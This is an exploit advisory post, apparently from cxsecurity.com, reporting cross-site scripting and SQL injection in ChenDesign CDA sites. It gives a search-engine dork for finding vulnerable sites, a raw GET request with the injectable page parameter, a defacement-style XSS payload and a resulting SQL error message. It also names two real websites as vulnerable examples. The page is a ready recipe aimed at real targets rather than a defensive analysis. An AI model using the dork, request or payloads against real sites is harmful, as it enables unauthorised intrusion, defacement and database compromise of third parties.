ChenDesign CDA - Cross site Scripting / Sql injection

2019.01.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit title : ChenDesign CDA - Cross site Scripting / Sql injection Exploit author : Salvatrucha software link : https://www.chendesign.com/ version : dork : intext:"site design by chendesign.com" || intext:"site design by CDA" Tested on : Win7_64 GET /search.php?page=[%Inject_Here%]&s=2&key=a&type=reports&order=pub_info&d=a HTTP/1.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* 1) the xss vulnerability : >CWECWE-79 >CVSS Base score: 5.3 — CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Exploit : >found a search box >Use payload/Injection : <acx><marquee><h style="font-size: 80px;">to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee> 2) the Sql Injection : >CWECWE-89 >CVSS Base score: 10 — CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N Web refences : >OWASP Injection Flaws Exploit : >http://target/search.php?page=[%Inject_Here%]&s=2&key=a&type=reports&order=pub_info&d=a Error message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\', 10' at line 1 Example of vulnerable apps: >http://www.s46986.gridserver.com >http://www.stillwatersci.com

References:

Salvatrucha


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top